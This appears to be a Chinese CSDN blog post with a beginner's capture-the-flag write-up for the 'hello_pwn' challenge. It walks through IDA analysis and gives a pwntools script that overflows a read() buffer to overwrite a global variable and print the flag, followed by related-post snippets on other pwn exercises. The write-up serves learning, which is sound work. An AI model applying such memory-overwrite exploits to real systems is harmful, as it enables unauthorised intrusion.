初学pwn

最新推荐文章于 2024-08-03 20:42:19 发布
最新推荐文章于 2024-08-03 20:42:19 发布
阅读量163 收藏
点赞数 1
文章标签: python wp 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53617146/article/details/121641852
版权

攻防世界的第二道题目,hello_pwn。
首先创建场景,使用nc进入远端,发现他只输出了一串字符串,没有别的内容,也无法使用ls查看它的文件。
在这里插入图片描述
下载场景提供的文件,使用cat查看,发现是ELF文件,按照大佬的流程,ELF文件直接用ida打开。
shift+f12查看字符串
在这里插入图片描述
看见可疑字符串welcome to ctf双击跟进,选中字符串Ctrl+x查找字符串的位置,f5反编译,可以看到伪代码
在这里插入图片描述
可以从main函数中看到,这里存在一个判断,如果条件达成的话,会调用一个函数。点开函数看一下。
可以发现里边会输出flag.txt,也就是我们的目标,所以我们现在需要使 dword_60106C 的值与 1853186401相等。点金这个变量看一下。发现它与unk_601068 的地址只相差四个字节。并且在main函数中有一个read在读取数据输入到变量中。
因此,我们可以利用read函数,将dword_60106C的值修改为1853186401。
在这里插入图片描述
具体脚本如下

from pwn import*
p = remote('111.200.241.244',60015)
#p = process('./hello_pwn')
payload = 'a'*4 + p64(1853186401).decode("iso-8859-1")
p.recvuntil("lets get helloworld for bof\n")
p.sendline(payload)
p.interactive()

这是使用sendline,在read进行读取的时候,想其中输入4个‘a’,因为一个字符型变量占据一个字节的空间,所以向后偏移之后,1853186401这个值就会赋给dword_60106C,达成条件,调用函数,获得flag。
在这里插入图片描述
在编写脚本的时候,遇到一个问题。因为我使用的是python3,对数据的格式要求更严格,因此,如果使用
payload = ‘a’ * 4 + p64(1853186401)
进行编译的话,会报错
File “mex.py”, line 4, in
payload = ‘a’*4 + p64(1853186401)
TypeError: can only concatenate str (not “bytes”) to str
这里显示字符类型不匹配,因此不能进行拼接。经过百度,有个大佬给出了一个解决方法,对他进行转码

payload = 'a'*4 + p64(1853186401).decode("iso-8859-1")
none-self
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
小白初学pwn(一)
小明的小书包Ya
09-12 2014
小白初学pwn 安装pwntools pip install pwntools 坑:最好使用Python2版本去运行你的脚本 进入Python交互环境测试一下我们的pwn是否安装好了 ⚡ root@kncc  /work/ctf/pwn-demo  python Python 2.7.15+ (default, Aug 31 2018, 11:56:52) [GCC 8.2.0...
pwn入门题目汇总.rar
09-01
本压缩包“pwn入门题目汇总.rar”显然是为初学者准备的一系列练习,旨在帮助他们了解和掌握pwn的基本概念和技术。 在学习pwn的过程中,首先需要理解的是计算机内存的工作原理,特别是栈、堆和全局变量的布局。栈是...
初学pwn-攻防世界(hello_pwn)
天柱的博客
08-26 3447
初学pwn-writeUp 攻防世界的第二道题目,hello_pwn。 首先创建场景,使用nc进入远端,发现他只输出了一串字符串,没有别的内容,也无法使用ls查看它的文件。 下载场景提供的文件,使用cat查看,发现是ELF文件,按照大佬的流程,ELF文件直接用ida打开。 初次使用ida,深切的感受到了ida的强大。 打开之后,按F5,进行反编译,可以看到main函数的伪代码 可以从main函数中看到,这里存在一个判断,如果条件达成的话,会调用一个函数。点开函数看一下。 可以发现里边会输出flag.tx
初学pwn-BUUCTF(rip)
天柱的博客
08-30 2482
初学pwn-writeUp BUUCTF平台的一道题目,rip。 与之前同样的步骤,启动靶机,链接远端 发现这里提示输入一些内容,但是输入完成之后,这里就结束了。还是要打开文件查看一下。 看到这里,只有一个输入的过程可以操作,那就很清楚了,就是要栈溢出了。点进去看一下。 可以看到这里s这个数组是15个字节,到r这个返回值还需要8个字节。不过这里要注意的一点是,这个15是十进制的,不能像之前再在数字之前加0x标记十六进制,这里可以直接写十进制。 摁shift+f12,可以看到这时还有什么地址可能会用到,
初学pwn-攻防世界(guess_num)
天柱的博客
08-28 1114
初学pwn-writeUp 攻防世界的第六题,guess_num。 从这个题目可以猜出来,是跟猜数字有关的题目。启动靶机。 使用nc链接远端,查看一下。 发现链接之后,首先是输出了欢迎界面,之后需要输入一个名字。输入完成之后就要求开始猜数字。但是要命的是,只能猜一次,猜错了就GG。没有办法,这条路行不通。 下载文件,cat一下,很明显,是一个ELF文件。放进ida里查看一下。 发现这里的逻辑,就是生成一个伪随机数,然后进行猜数字。可以看到在23行这里,给srand函数设置了一个种子,然后进入循环,生成随
初学pwn-攻防世界(get_shell)
天柱的博客
08-26 1682
初学pwn - writeUp 从攻防世界新手区的第一道题目开始,首先是get_shell,题目上说这道题很贱单,运行就可以获取shell。这里首先使用到的工具是nc(netcat)。 Netcat 是一款简单的Unix工具,使用UDP和TCP协议。使用它你可以轻易的建立任何连接。内建有很多实用的工具。功能非常强大,这里列举一下百度到的内容,这里就算了,之后再专门介绍一下。 telnet / 获取系统 banner 信息 传输文本信息 传输文件和目录 加密传输文件 端口扫描 远程控制 / 正方向 shel
初学pwn-攻防世界(level0)
天柱的博客
08-27 1002
初学pwn-writeUp 攻防世界的第三道题目,level0。 首先还是先创建场景,使用nc进入远端,发现输出了一个Hello,World,之后什么都没有了,使用ls也没有反应,说明这需要我们获取shell了。 下载文件,先用checksec查看一下 这里简单介绍一些checksec这个工具: 1、Relro:No Relro(重定位表只读)   Relocation Read Only, 重定位表只读。重定位表即.got 和 .plt 两个表。   RELRO会有No RELRO、Partial RE
初学pwn-BUUCTF(ciscn_2019_n_1)
天柱的博客
08-31 615
初学pwn-writeUp BUUCTF的第四道题,ciscn-2019_n_1。 首先还是链接远端查看一下。 这里提示让猜一个数字,然后他告诉我们,这个数字应该是11.28125。这就有点掩耳盗铃了呀,但是输入了11.28125,还是在说应该输入11.28125。可能是有点问题,ida打开查看一下。 可以看到主函数里,调用了三个函数,前两个都是set某个值,我们直接看func函数。 那这就很明显了,刚刚输入的值赋给了v1,但是这里是要让v2的值等于11.28125才可以。查看一下地址。 嗯,跟想象
初学pwn-BUUCTF(warmup_csaw_2016)
天柱的博客
08-31 340
初学pwn-writeUp BUUCTF的第三道题,warmup_csaw_2016。 首先链接远端, 发现这里输出了一个十六进制的数字,就没有了后续。我们下载文件,持用ida打开查看。 可以看到主函数这里上边全部都是输出,只有最后return的时候,有一个get命令,给v5这个数组进行赋值。从这里可以发信啊,刚刚输出的一个地址,是sub40060D这个函数的地址。点进去看一下。 哦吼,cat flag.txt,那没毛病了,只需要在主函数的get这产生栈溢出,覆盖掉返回的值,就可以执行这个函数,获取f
pwn初学记录
limenzzz的博客
10-19 504
pwn的基础题目学习
pwn100题目文件及exp.zip
08-09
在IT安全领域,尤其是逆向工程和漏洞利用中,“pwn”是一个常见的术语,它涵盖了对软件漏洞的利用,特别是那些允许攻击者获得系统...同时,对于初学者来说,理解这些概念并逐步应用它们是提升漏洞利用技能的重要过程。
ciscn-2019-pwn
11-29
1. **baby_pwn** - 这个名字通常用于新手级别的Pwn题目,"baby"意味着它相对简单,是初学者学习基础漏洞利用技术的入门级挑战。 2. **bms** - 可能代表“Building Management System”,是一个模拟建筑管理系统的...
pwn栈溢出10道练习题有writeup
01-04
7. **writeup的价值**:提供的writeup将详细解释每个练习题的解题思路和过程,这对于初学者来说是宝贵的学习资源。通过分析writeup,你可以了解如何分析程序、找到漏洞、构造payload并验证成功利用。 8. **安全编程...
PWM.zip_51pwm波控制LED_51控制pwn_PWN波_pwm中断_pwn呼吸灯设计
09-14
通过学习和实践这个示例,初学者不仅可以掌握51单片机的PWM应用,还能了解到中断机制在实际项目中的运用,为进一步的嵌入式开发打下基础。在设计PWM呼吸灯时,需要考虑如何平滑地改变占空比,以达到自然的亮暗过渡...
Python爬虫与MongoDB的完美结合
weixin_52392194的博客
08-03 348
我们掌握了在Windows和Linux系统下安装MongoDB,设计适合爬虫存储数据的写入规范,并通过实际爬虫示例展示了如何将爬取到的数据存储到MongoDB中。此外,还进行了MongoDB性能优化,提高了数据存储和查询的效率。
破解PyCharm中Python.h缺失之谜:一键定位与修复指南
最新发布
2401_85763803的博客
08-03 287
的问题通常涉及到Python安装的完整性、环境变量的设置以及PyCharm的配置。通过上述步骤,你应该能够解决这个问题,并继续你的Python开发工作。记住,正确的配置和环境设置是开发过程中不可或缺的一部分。然而,在开发过程中,开发者可能会遇到一个令人头疼的问题:PyCharm提示找不到。找不到的问题,让你的开发之路更加顺畅。首先,你需要确保Python安装是完整的,包括开发头文件。如果你使用的是Python的官方安装包,通常开发头文件是包含在内的。确保你的项目配置正确,包括C/C++编译器的设置。
Selenium与WebDriver:Errno 8 Exec格式错误的多种解决方案
ip16yun的博客
07-30 387
在使用Selenium和WebDriver进行网页自动化时,可能会遇到各种错误。其中一个常见问题是执行格式错误(Errno 8 Exec format error)。这个错误通常在运行ChromeDriver时出现,错误提示涉及路径中的某个文件。本文将概述这个问题的背景,并提供多种解决方案,包括如何使用代理IP技术进行数据抓取。
【ROS2】概念:高级-构建系统
cxyhjl的博客
07-30 383
目录构建工具构建助手ament_package包ament_cmake仓库ament_lint仓库元构建工具构建系统是允许开发人员根据需要构建其 ROS 2 代码的工具。ROS 2 在很大程度上依赖于将代码划分为包,每个包都包含一个清单文件 (package.xml)。此清单文件包含有关包的基本元数据,包括其对其他包的依赖性。此清单是元构建工具正常运行所必需的。ROS ...
二进制利用入门:Pwn挑战解析
"Introduction-to-Pwn.pdf - pwn学习手册" 在网络安全领域,"pwn"是一种专门针对二进制漏洞利用的技术,它涉及到如何利用软件中的安全漏洞来控制或破坏系统。"Introduction to Pwn"这份手册是为那些对中级到高级的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值